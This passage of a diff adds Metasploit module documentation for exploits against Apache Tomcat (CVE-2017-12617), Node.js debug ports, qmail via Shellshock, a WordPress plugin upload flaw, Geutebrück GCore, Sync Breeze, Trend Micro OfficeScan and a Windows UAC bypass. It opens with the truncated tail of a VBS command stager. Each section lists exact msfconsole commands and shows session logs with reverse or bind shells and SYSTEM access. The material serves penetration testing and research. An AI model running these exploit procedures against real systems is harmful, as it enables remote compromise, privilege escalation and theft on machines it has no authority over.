Next >>%TEMP%\uFLQh.vbs & echo base64_decode = strOut >>%TEMP%\uFLQh.vbs & echo End Function >>%TEMP%\uFLQh.vbs & echo Function mimedecode(byVal strIn) >>%TEMP%\uFLQh.vbs & echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>%TEMP%\uFLQh.vbs & echo If Len(strIn) = 0 Then >>%TEMP%\uFLQh.vbs & echo mimedecode = -1 : Exit Function >>%TEMP%\uFLQh.vbs & echo Else >>%TEMP%\uFLQh.vbs & echo mimedecode = InStr(Base64Chars, strIn) - 1 >>%TEMP%\uFLQh.vbs & echo End If >>%TEMP%\uFLQh.vbs & echo End Function >>%TEMP%\uFLQh.vbs & cscript //nologo %TEMP%\uFLQh.vbs & del %TEMP%\uFLQh.vbs & del %TEMP%\aAqsZ.b64
|
||||||
|
[*] Command Stager progress - 100.00% done (101881/101881 bytes)
|
||||||
|
[*] Sending stage (956991 bytes) to 2.2.2.2
|
||||||
|
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:1422) at 2017-10-06 14:00:14 -0400
|
||||||
|
|
||||||
|
meterpreter > sysinfo
|
||||||
|
Computer : WINXP
|
||||||
|
OS : Windows XP (Build 2600, Service Pack 3).
|
||||||
|
Architecture : x86
|
||||||
|
System Language : en_US
|
||||||
|
Domain : GROUP
|
||||||
|
Logged On Users : 2
|
||||||
|
Meterpreter : x86/windows
|
||||||
|
meterpreter >
|
||||||
|
```
|
|
@ -0,0 +1,53 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module uses a PUT request bypass to upload a jsp shell to a vulnerable Apache Tomcat configuration.
|
||||||
|
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialization parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617
|
||||||
|
|
||||||
|
To set up a vulnerable installation:
|
||||||
|
1. Download and install an affected version of Apache Tomcat.
|
||||||
|
2. Download and install Java. [Choose an appropriate version](http://tomcat.apache.org/whichversion.html) based on the Apache Tomcat version you downloaded.
|
||||||
|
3. In conf directory of Apache Tomcat, edit the web.xml file and set the "readonly" parameter to false for the default servlet.
|
||||||
|
4. Restart the Tomcat service.
|
||||||
|
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use exploit/multi/http/tomcat_jsp_upload_bypass```
|
||||||
|
1. Do: ```set payload java/jsp_shell_bind_tcp```
|
||||||
|
2. Do: ```set RHOST [IP]```
|
||||||
|
3. Do: ```set RPORT [PORT]```
|
||||||
|
4. Do: ```check```
|
||||||
|
5. It should be reported as vulnerable
|
||||||
|
6. Do: ```run```
|
||||||
|
7. You should get a shell
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use exploit/multi/http/tomcat_jsp_upload_bypass
|
||||||
|
msf exploit(tomcat_jsp_upload_bypass) > set payload java/jsp_shell_bind_tcp
|
||||||
|
payload => java/jsp_shell_bind_tcp
|
||||||
|
msf exploit(tomcat_jsp_upload_bypass) > set RHOST 10.10.40.93
|
||||||
|
RHOST => 10.10.40.93
|
||||||
|
msf exploit(tomcat_jsp_upload_bypass) > set RPORT 8080
|
||||||
|
RPORT => 8080
|
||||||
|
msf exploit(tomcat_jsp_upload_bypass) > check
|
||||||
|
[+] 10.10.40.93:8080 The target is vulnerable.
|
||||||
|
msf exploit(tomcat_jsp_upload_bypass) > run
|
||||||
|
|
||||||
|
[*] Started bind handler
|
||||||
|
[*] Uploading payload...
|
||||||
|
[*] Payload executed!
|
||||||
|
[*] Command shell session 1 opened (10.10.230.230:39979 -> 10.10.40.93:4444) at 2017-10-11 07:43:08 -0400
|
||||||
|
|
||||||
|
Microsoft Windows [Version 6.3.9600]
|
||||||
|
(c) 2013 Microsoft Corporation. All rights reserved.
|
||||||
|
|
||||||
|
C:\Program Files\apache-tomcat-7.0.81>whoami
|
||||||
|
whoami
|
||||||
|
nt authority\system
|
||||||
|
|
||||||
|
```
|
|
@ -0,0 +1,64 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
Current and historical versions of node (or any JS env based on the
|
||||||
|
V8 JS engine) have this functionality and could be exploitable if
|
||||||
|
configured to expose the JS port on an untrusted interface.
|
||||||
|
|
||||||
|
Install a version of node using any of the normal methods:
|
||||||
|
* Vendor: https://nodejs.org/en/download/package-manager/
|
||||||
|
* Distro: `sudo apt-get install nodejs`
|
||||||
|
|
||||||
|
Alternately, use standard node docker containers as targets:
|
||||||
|
```
|
||||||
|
$ docker run -it --rm -p 5858:5858 node:4-wheezy node --debug=0.0.0.0:5858
|
||||||
|
```
|
||||||
|
(Others at https://hub.docker.com/_/node/)
|
||||||
|
|
||||||
|
Tested on Node 7.x, 6.x, 4.x
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Run a node process exposing the debug port
|
||||||
|
```
|
||||||
|
node --debug=0.0.0.0:5858
|
||||||
|
```
|
||||||
|
|
||||||
|
2. Exploit it and catch the callback:
|
||||||
|
|
||||||
|
```
|
||||||
|
msfconsole -x "use exploit/multi/misc/nodejs_v8_debugger; set RHOST 127.0.0.1; set PAYLOAD nodejs/shell_reverse_tcp; set LHOST 127.0.0.1; handler -H 0.0.0.0 -P 4444 -p nodejs/shell_reverse_tcp; exploit
|
||||||
|
```
|
||||||
|
(If using docker hosts as targets for testing, ensure that LHOST addr is accessible to the container)
|
||||||
|
|
||||||
|
Note that in older Node versions (notably 4.8.4), the debugger will not immediately process the incoming eval message. As soon as there is some kind of activity
|
||||||
|
(such as a step or continue in the debugger, or just hitting enter), the payload will execute and the handler session will start.
|
||||||
|
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### Example Run (Node 7.x)
|
||||||
|
|
||||||
|
Victim:
|
||||||
|
```
|
||||||
|
$ node --version
|
||||||
|
v7.10.0
|
||||||
|
$ node --debug=0.0.0.0:5858
|
||||||
|
(node:83089) DeprecationWarning: node --debug is deprecated. Please use node --inspect instead.
|
||||||
|
Debugger listening on 0.0.0.0:5858
|
||||||
|
>
|
||||||
|
(To exit, press ^C again or type .exit)
|
||||||
|
```
|
||||||
|
|
||||||
|
Attacker:
|
||||||
|
```
|
||||||
|
msf exploit(nodejs_v8_debugger) > exploit
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 10.0.0.141:4444
|
||||||
|
[*] 127.0.0.1:5858 - Sending 745 byte payload...
|
||||||
|
[*] 127.0.0.1:5858 - Got success response
|
||||||
|
[*] Command shell session 4 opened (10.0.0.141:4444 -> 10.0.0.141:53168) at 2017-09-04 00:37:17 -0700
|
||||||
|
|
||||||
|
id
|
||||||
|
(redacted)
|
||||||
|
```
|
||||||
|
|
|
@ -0,0 +1,82 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
Any qmail version (works on latest versions, qmail-1.03 and netqmail-1.06) running on a system with a vulnerable BASH (Shellshock). In order to execute code, /bin/sh has to be linked to bash (usually default configuration) and a valid recipient must be set on the RCPT TO field (usually admin@exampledomain.com). The exploit does not work on the "qmailrocks" community version as it ensures the MAILFROM field is well-formed.
|
||||||
|
|
||||||
|
## Setting up a vulnerable environment
|
||||||
|
|
||||||
|
Install Qmail on a Linux server with a shellshock vulnerable bash. Ensure that /bin/sh is linked to bash. Create an e-mail account on that qmail server. IMPORTANT: there is a community version of qmail, "qmailrocks" (http://qmailrocks.thibs.com/) which apply a patch that checks the vulnerable MAILFROM parameter. This version (with the patch applied) is NOT vulnerable. If you are using this version, change the "int mfcheck()" function on qmail-smtpd.c and ensure it returns always 0 (after applying the patch) and re-compile qmail-smtpd.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. `use exploit/unix/smtp/qmail_bash_env_exec`
|
||||||
|
2. `set RHOST <target IP>`
|
||||||
|
3. `set MAILTO <valid e-mail recipient>`
|
||||||
|
4. `set payload cmd/unix/reverse`
|
||||||
|
5. `set LHOST <local IP>`
|
||||||
|
7. optionally set `RPORT` and `LPORT`
|
||||||
|
8. `exploit`
|
||||||
|
9. **Verify** a new shell session is started
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
**MAILTO**
|
||||||
|
|
||||||
|
A valid e-mail recipient. Usually, admin@targetdomain.com can be used.
|
||||||
|
|
||||||
|
## Sample Output
|
||||||
|
**Tested on qmail-1.03 on Debian 6.0.6 (squeeze). BASH version 4.1.5(1).**
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use exploit/unix/smtp/qmail_bash_env_exec
|
||||||
|
msf exploit(qmail_bash_env_exec) > set rhost 192.168.1.113
|
||||||
|
rhost => 192.168.1.113
|
||||||
|
msf exploit(qmail_bash_env_exec) > set mailto "admin@testqmail2.test"
|
||||||
|
mailto => admin@testqmail2.test
|
||||||
|
msf exploit(qmail_bash_env_exec) > set payload cmd/unix/reverse
|
||||||
|
payload => cmd/unix/reverse
|
||||||
|
msf exploit(qmail_bash_env_exec) > show options
|
||||||
|
|
||||||
|
Module options (exploit/unix/smtp/qmail_bash_env_exec):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
MAILTO admin@testqmail2.test yes TO address of the e-mail
|
||||||
|
RHOST 192.168.1.113 yes The target address
|
||||||
|
RPORT 25 yes The target port (TCP)
|
||||||
|
|
||||||
|
|
||||||
|
Payload options (cmd/unix/reverse):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
LHOST 192.168.1.102 yes The listen address
|
||||||
|
LPORT 4444 yes The listen port
|
||||||
|
|
||||||
|
|
||||||
|
Exploit target:
|
||||||
|
|
||||||
|
Id Name
|
||||||
|
-- ----
|
||||||
|
0 Automatic
|
||||||
|
|
||||||
|
|
||||||
|
msf exploit(qmail_bash_env_exec) > run
|
||||||
|
|
||||||
|
[*] Started reverse TCP double handler on 192.168.1.102:4444
|
||||||
|
[*] 192.168.1.113:25 - Sending the payload...
|
||||||
|
[*] 192.168.1.113:25 - Sending RCPT TO admin@testqmail2.test
|
||||||
|
[*] Accepted the first client connection...
|
||||||
|
[*] Accepted the second client connection...
|
||||||
|
[*] Command: echo RvZfov9i2ZuveLXA;
|
||||||
|
[*] Writing to socket A
|
||||||
|
[*] Writing to socket B
|
||||||
|
[*] Reading from sockets...
|
||||||
|
[*] Reading from socket B
|
||||||
|
[*] B: "RvZfov9i2ZuveLXA\r\n"
|
||||||
|
[*] Matching...
|
||||||
|
[*] A is input...
|
||||||
|
[*] Command shell session 19 opened (192.168.1.102:4444 -> 192.168.1.113:48167) at 2017-05-04 15:11:02 +0200
|
||||||
|
|
||||||
|
whoami
|
||||||
|
vpopmail
|
||||||
|
```
|
|
@ -0,0 +1,63 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
wp-mobile-detector is a wordpress plugin which was removed from the wordpress site after this vulnerability
|
||||||
|
was disclosed. Version 3.5 and earlier can be directed to upload a file from a remote web server, and then
|
||||||
|
the file can be executed by the client.
|
||||||
|
|
||||||
|
Download [wp-mobile-detector](https://www.exploit-db.com/apps/bf8bdbac0b01e14788aa2d4a0d9c6971-wp-mobile-detector.3.5.zip)
|
||||||
|
from Exploit-db since wordpress removed it.
|
||||||
|
|
||||||
|
Due to its age, it may be difficult to install. The install for the scenario later is:
|
||||||
|
|
||||||
|
* Ubuntu 16.04.2
|
||||||
|
* Apache 2.4.18
|
||||||
|
* PHP 7
|
||||||
|
* Wordpress 4.4.2
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
Example steps in this format (is also in the PR):
|
||||||
|
|
||||||
|
1. Install the application
|
||||||
|
2. Start msfconsole
|
||||||
|
3. Do: ```use exploit/unix/webapp/wp_mobile_detector_upload_execute```
|
||||||
|
4. Do: ```set rhost [ip]```
|
||||||
|
5. Do: ```set lhost [ip]```
|
||||||
|
6. Do: ```set srvhost [ip]```
|
||||||
|
7. Do: ```exploit```
|
||||||
|
8. You should get a shell.
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### wp-mobile-detector 3.5 on Wordpress 4.4.2
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use exploit/unix/webapp/wp_mobile_detector_upload_execute
|
||||||
|
msf exploit(wp_mobile_detector_upload_execute) > set rhost 2.2.2.2
|
||||||
|
rhost => 2.2.2.2
|
||||||
|
msf exploit(wp_mobile_detector_upload_execute) > set TARGETURI /wordpress/
|
||||||
|
TARGETURI => /wordpress/
|
||||||
|
msf exploit(wp_mobile_detector_upload_execute) > check
|
||||||
|
[*] 2.2.2.2:80 The target appears to be vulnerable.
|
||||||
|
msf exploit(wp_mobile_detector_upload_execute) > set payload php/meterpreter/reverse_tcp
|
||||||
|
payload => php/meterpreter/reverse_tcp
|
||||||
|
smsf exploit(wp_mobile_detector_upload_execute) > set lhost 1.1.1.1
|
||||||
|
lhost => 1.1.1.1
|
||||||
|
msf exploit(wp_mobile_detector_upload_execute) > set srvhost 1.1.1.1
|
||||||
|
srvhost => 1.1.1.1
|
||||||
|
msf exploit(wp_mobile_detector_upload_execute) > exploit
|
||||||
|
[*] Exploit running as background job 2.
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 1.1.1.1:4444
|
||||||
|
msf exploit(wp_mobile_detector_upload_execute) > [*] Starting Payload Server
|
||||||
|
[*] Using URL: http://1.1.1.1:8080/ZWTgqwsiFL.php
|
||||||
|
[*] Uploading payload via /wordpress/wp-content/plugins/wp-mobile-detector/resize.php?src=http://1.1.1.1:8080/ZWTgqwsiFL.php
|
||||||
|
[+] Payload requested on server, sending
|
||||||
|
[+] Sleeping 5 seconds for payload upload
|
||||||
|
[*] Executing the payload via /wordpress/wp-content/plugins/wp-mobile-detector/cache/ZWTgqwsiFL.php
|
||||||
|
[*] Sending stage (37514 bytes) to 2.2.2.2
|
||||||
|
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:47064) at 2017-10-20 22:54:04 -0400
|
||||||
|
[+] Deleted ZWTgqwsiFL.php
|
||||||
|
[*] Server stopped.
|
||||||
|
```
|
||||||
|
|
|
@ -0,0 +1,69 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
Geutebrück GCore Server 1.3.8.42, 1.4.2.37 are vulnerable to a buffer overflow exploitation.
|
||||||
|
Since this application is started with system privileges this allows a system remote code execution.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Install Windows as basic OS (Tested with Win2012R2, Windows 7)
|
||||||
|
2. Install the Geutebrück GCore server
|
||||||
|
3. Verify that http://<your target ip>:13003/statistics/runningmoduleslist.xml available is.
|
||||||
|
4. Start msfconsole
|
||||||
|
5. Do: ```use [exploit/windows/http/geutebrueck_gcore_x64_rce_bo]```
|
||||||
|
6. Do: ```set rhost <your target ip>```
|
||||||
|
7. Do: ```set rport 13003```
|
||||||
|
8. Do: ```set payload windows/x64/meterpreter/reverse_tcp```
|
||||||
|
9. Do: ```exploit```
|
||||||
|
10. You should get a shell as NT/SYSTEM.
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### Geutebrueck GCore 1.4.2.37
|
||||||
|
|
||||||
|
```
|
||||||
|
msf exploit(geutebrueck_gcore_x64_rce_bo) > show options
|
||||||
|
|
||||||
|
Module options (exploit/windows/http/geutebrueck_gcore_x64_rce_bo):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
RHOST 192.168.1.10 yes The target address
|
||||||
|
RPORT 13003 yes The target port
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Payload options (windows/x64/meterpreter/reverse_tcp):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
|
||||||
|
LHOST 192.168.1.11 yes The listen address
|
||||||
|
LPORT 4444 yes The listen port
|
||||||
|
|
||||||
|
|
||||||
|
Exploit target:
|
||||||
|
|
||||||
|
Id Name
|
||||||
|
-- ----
|
||||||
|
0 Automatic Targeting
|
||||||
|
|
||||||
|
msf exploit(geutebrueck_gcore_x64_rce_bo) > exploit
|
||||||
|
[*] Started reverse TCP handler on 192.168.1.11:4444
|
||||||
|
[*] 192.168.1.10:13003 - Trying to fingerprint server with http://192.168.1.10:13003/statistics/runningmoduleslist.xml...
|
||||||
|
[*] 192.168.1.10:13003 - Vulnerable version detected: GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)
|
||||||
|
[*] 192.168.1.10:13003 - Preparing ROP chain for target 1.4.2.37!
|
||||||
|
[*] 192.168.1.10:13003 - Crafting Exploit...
|
||||||
|
[*] 192.168.1.10:13003 - Exploit ready for sending...
|
||||||
|
[*] 192.168.1.10:13003 - Exploit sent! [*] Sending stage (1188415 bytes) to
|
||||||
|
[*] Meterpreter session 1 opened ( :4444 -> 49963) at 2017-11-03 13:14:51 +0200
|
||||||
|
[*] 192.168.1.10:13003 - Closing socket.
|
||||||
|
meterpreter > getsystem
|
||||||
|
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
|
||||||
|
meterpreter > getuid Server username:
|
||||||
|
NT-AUTORITÄT\SYSTEM
|
||||||
|
meterpreter >
|
||||||
|
```
|
||||||
|
|
||||||
|
## Mitigation
|
||||||
|
|
||||||
|
Geutebrück released a new version and an update for the affected product which should be installed to fix the described vulnerabilities.
|
|
@ -1,6 +1,6 @@
|
||||||
## Vulnerable Application
|
## Vulnerable Application
|
||||||
|
|
||||||
[Sync Breeze Enterprise](http://www.syncbreeze.com) versions up to v9.4.28 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [Sync Breeze Enterprise](http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.4.28.exe).
|
[Sync Breeze Enterprise](http://www.syncbreeze.com) versions up to v9.4.28 and v10.0.28 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerabilities are caused by improper bounds checking of the request path in HTTP GET requests and username value via HTTP POST requests sent to the built-in web server, respectively. This module has been tested successfully on Windows 7 SP1. The vulnerable applications are available for download at [Sync Breeze Enterprise v9.4.28](http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.4.28.exe) and [Sync Breeze Enterprise v10.0.28](http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe).
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
1. Install a vulnerable Sync Breeze Enterprise
|
1. Install a vulnerable Sync Breeze Enterprise
|
||||||
|
@ -10,13 +10,14 @@
|
||||||
5. Check `Enable Web Server On Port 80` to start the web interface
|
5. Check `Enable Web Server On Port 80` to start the web interface
|
||||||
6. Start `msfconsole`
|
6. Start `msfconsole`
|
||||||
7. Do `use exploit/windows/http/syncbreeze_bof`
|
7. Do `use exploit/windows/http/syncbreeze_bof`
|
||||||
8. Do `set RHOST ip`
|
8. Select appropriate target via `set target 0` or `set target 1`
|
||||||
9. Do `check`
|
9. Do `set RHOST ip`
|
||||||
10. Verify the target is vulnerable
|
10. Do `check`
|
||||||
11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
|
11. Verify the target is vulnerable
|
||||||
12. Do `set LHOST ip`
|
12. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
|
||||||
13. Do `exploit`
|
13. Do `set LHOST ip`
|
||||||
14. Verify the Meterpreter session is opened
|
14. Do `exploit`
|
||||||
|
15. Verify the Meterpreter session is opened
|
||||||
|
|
||||||
## Scenarios
|
## Scenarios
|
||||||
|
|
||||||
|
@ -72,3 +73,34 @@ Logged On Users : 3
|
||||||
Meterpreter : x86/windows
|
Meterpreter : x86/windows
|
||||||
meterpreter >
|
meterpreter >
|
||||||
```
|
```
|
||||||
|
|
||||||
|
###Sync Breeze Enterprise v10.0.28 on Windows 7 SP1
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use exploit/windows/http/syncbreeze_bof
|
||||||
|
msf exploit(syncbreeze_bof) > set rhost 192.168.10.61
|
||||||
|
rhost => 192.168.10.61
|
||||||
|
msf exploit(syncbreeze_bof) > set target 1
|
||||||
|
target => 1
|
||||||
|
msf exploit(syncbreeze_bof) > exploit
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 192.168.10.60:4444
|
||||||
|
[*] Sending request...
|
||||||
|
[*] Sending stage (171583 bytes) to 192.168.10.61
|
||||||
|
[*] Meterpreter session 1 opened (192.168.10.60:4444 -> 192.168.10.61:4129) at 2017-10-09 13:22:15 -0400
|
||||||
|
[+] negotiating tlv encryption
|
||||||
|
[+] negotiated tlv encryption
|
||||||
|
[+] negotiated tlv encryption
|
||||||
|
|
||||||
|
meterpreter > getuid
|
||||||
|
Server username: NT AUTHORITY\SYSTEM
|
||||||
|
meterpreter > sysinfo
|
||||||
|
Computer : MUSHROOMKINGDOM
|
||||||
|
OS : Windows 7 (Build 7600).
|
||||||
|
Architecture : x86
|
||||||
|
System Language : en_US
|
||||||
|
Domain : WORKGROUP
|
||||||
|
Logged On Users : 2
|
||||||
|
Meterpreter : x86/windows
|
||||||
|
meterpreter >
|
||||||
|
```
|
|
@ -0,0 +1,60 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user.
|
||||||
|
|
||||||
|
The Trend Micro OfficeScan product has a widget feature which is implemented with PHP. Talker.php takes ack and hash parameters but doesn't validate these values, which leads to an authentication bypass for the widget. Proxy.php files under the mod TMCSS folder take multiple parameters but the process does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the web server user.
|
||||||
|
|
||||||
|
**Vulnerable Application Installation Steps**
|
||||||
|
|
||||||
|
1. Open following URL [http://downloadcenter.trendmicro.com/](http://downloadcenter.trendmicro.com/)
|
||||||
|
2. Find "OfficeScan" and click.
|
||||||
|
3. At the time of writing this documentation, you must see "osce-xg-win-en-gm-b1315.exe" next to Download button.
|
||||||
|
4. Click to the download button and complete installation of ISO.
|
||||||
|
5. Install the downloaded file on Windows operating system. (Tested with Windows 7)
|
||||||
|
|
||||||
|
If you don't see an affected version of OfficeScan, you can try to download it directly from following URL.
|
||||||
|
|
||||||
|
[http://download.trendmicro.com/products/officescan/XG/osce_xg_win_en_gm_b1315.exe](http://download.trendmicro.com/products/officescan/XG/osce_xg_win_en_gm_b1315.exe)
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
A successful check of the exploit will look like this:
|
||||||
|
|
||||||
|
- [ ] Start `msfconsole`
|
||||||
|
- [ ] `use exploit/windows/http/trendmicro_officescan_widget_exec`
|
||||||
|
- [ ] Set `RHOST`
|
||||||
|
- [ ] Set `LHOST`
|
||||||
|
- [ ] Run `check`
|
||||||
|
- [ ] **Verify** that you are seeing `The target is vulnerable.`
|
||||||
|
- [ ] Run `exploit`
|
||||||
|
- [ ] **Verify** that you are seeing `Authenticated successfully bypassed` value.
|
||||||
|
- [ ] **Verify** that you are getting `meterpreter` session.
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### Trend Micro OfficeScan 11 on Win7
|
||||||
|
|
||||||
|
```
|
||||||
|
msf exploit(trendmicro_officescan_widget_exec) > exploit
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 12.0.0.1:4444
|
||||||
|
[*] Auto detection enabled. Trying to detect target system version.
|
||||||
|
[*] Target system selected : OfficeScan 11
|
||||||
|
[*] Exploiting authentication bypass
|
||||||
|
[+] Authenticated successfully bypassed.
|
||||||
|
[*] Generating payload
|
||||||
|
[*] Trigerring command injection vulnerability
|
||||||
|
[*] Sending stage (179267 bytes) to 12.0.0.176
|
||||||
|
[*] Meterpreter session 9 opened (12.0.0.1:4444 -> 12.0.0.176:49842) at 2017-10-09 21:57:29 +0300
|
||||||
|
|
||||||
|
meterpreter > sysinfo
|
||||||
|
Computer : CME
|
||||||
|
OS : Windows 7 (Build 7601, Service Pack 1).
|
||||||
|
Architecture : x86
|
||||||
|
System Language : tr_TR
|
||||||
|
Domain : WORKGROUP
|
||||||
|
Logged On Users : 1
|
||||||
|
Meterpreter : x86/windows
|
||||||
|
meterpreter >
|
||||||
|
|
||||||
|
```
|
|
@ -0,0 +1,295 @@
|
||||||
|
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module adds a bypass for UAC that relies on DLL hijacking of the dccw.exe process. It has been tested on and
|
||||||
|
supports both x86 and x64 releases of Windows 8, 8.1, 10_1511, 10_1607, and 10_1703. It does not work with any versions of Windows 7.
|
||||||
|
|
||||||
|
### Vulnerable application setup
|
||||||
|
Not Applicable; works on stock Windows releases.
|
||||||
|
|
||||||
|
### Running Example:
|
||||||
|
```
|
||||||
|
> use exploit/multi/handler
|
||||||
|
> set payload windows/meterpreter/reverse_tcp
|
||||||
|
payload => windows/meterpreter/reverse_tcp
|
||||||
|
> set LHOST <MSF_IP>
|
||||||
|
LHOST => <MSF_IP>
|
||||||
|
> set LPORT 30009
|
||||||
|
LPORT => 30009
|
||||||
|
> show options
|
||||||
|
|
||||||
|
Module options (exploit/multi/handler):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
|
||||||
|
|
||||||
|
Payload options (windows/meterpreter/reverse_tcp):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
|
||||||
|
LHOST <MSF_IP> yes The listen address
|
||||||
|
LPORT 30009 yes The listen port
|
||||||
|
|
||||||
|
|
||||||
|
Exploit target:
|
||||||
|
|
||||||
|
Id Name
|
||||||
|
-- ----
|
||||||
|
0 Wildcard Target
|
||||||
|
|
||||||
|
|
||||||
|
> run -z
|
||||||
|
[*] Started reverse TCP handler on <MSF_IP>:30009
|
||||||
|
[*] Starting the payload handler...
|
||||||
|
[*] Sending stage (957487 bytes) to <Win10x86_IP>
|
||||||
|
[*] Meterpreter session 1 opened (<MSF_IP>:30009 -> <Win10x86_IP>:50041) at 2017-10-03 12:17:42 -0700
|
||||||
|
[*] Session 1 created in the background.
|
||||||
|
> sessions -C sysinfo
|
||||||
|
[*] Running 'sysinfo' on meterpreter session 1 (<Win10x86_IP>)
|
||||||
|
Computer : WIN10X86-1511
|
||||||
|
OS : Windows 10 (Build 10586).
|
||||||
|
Architecture : x86
|
||||||
|
System Language : en_US
|
||||||
|
Domain : WORKGROUP
|
||||||
|
Logged On Users : 4
|
||||||
|
Meterpreter : x86/windows
|
||||||
|
> sessions -C ifconfig
|
||||||
|
[*] Running 'ifconfig' on meterpreter session 1 (<Win10x86_IP>)
|
||||||
|
|
||||||
|
Interface 1
|
||||||
|
============
|
||||||
|
Name : Software Loopback Interface 1
|
||||||
|
Hardware MAC : 00:00:00:00:00:00
|
||||||
|
MTU : 4294967295
|
||||||
|
IPv4 Address : 127.0.0.1
|
||||||
|
IPv4 Netmask : 255.0.0.0
|
||||||
|
IPv6 Address : ::1
|
||||||
|
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
|
||||||
|
|
||||||
|
|
||||||
|
Interface 2
|
||||||
|
============
|
||||||
|
Name : Teredo Tunneling Pseudo-Interface
|
||||||
|
Hardware MAC : 00:00:00:00:00:00
|
||||||
|
MTU : 1280
|
||||||
|
IPv6 Address : 2001:0:4137:9e76:38b8:1e49:3f57:795f
|
||||||
|
IPv6 Netmask : ffff:ffff:ffff:ffff::
|
||||||
|
IPv6 Address : fe80::38b8:1e49:3f57:795f
|
||||||
|
IPv6 Netmask : ffff:ffff:ffff:ffff::
|
||||||
|
|
||||||
|
|
||||||
|
Interface 3
|
||||||
|
============
|
||||||
|
Name : Intel(R) 82574L Gigabit Network Connection
|
||||||
|
Hardware MAC : 00:0c:29:73:25:67
|
||||||
|
MTU : 1500
|
||||||
|
IPv4 Address : <Win10x86_IP>
|
||||||
|
IPv4 Netmask : 255.255.255.0
|
||||||
|
IPv6 Address : fe80::cc97:6548:c10a:f034
|
||||||
|
IPv6 Netmask : ffff:ffff:ffff:ffff::
|
||||||
|
|
||||||
|
|
||||||
|
Interface 6
|
||||||
|
============
|
||||||
|
Name : Microsoft ISATAP Adapter #2
|
||||||
|
Hardware MAC : 00:00:00:00:00:00
|
||||||
|
MTU : 1280
|
||||||
|
IPv6 Address : fe80::5efe:c0a8:86a0
|
||||||
|
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
|
||||||
|
|
||||||
|
> sessions -l
|
||||||
|
|
||||||
|
Active sessions
|
||||||
|
===============
|
||||||
|
|
||||||
|
Id Type Information Connection
|
||||||
|
-- ---- ----------- ----------
|
||||||
|
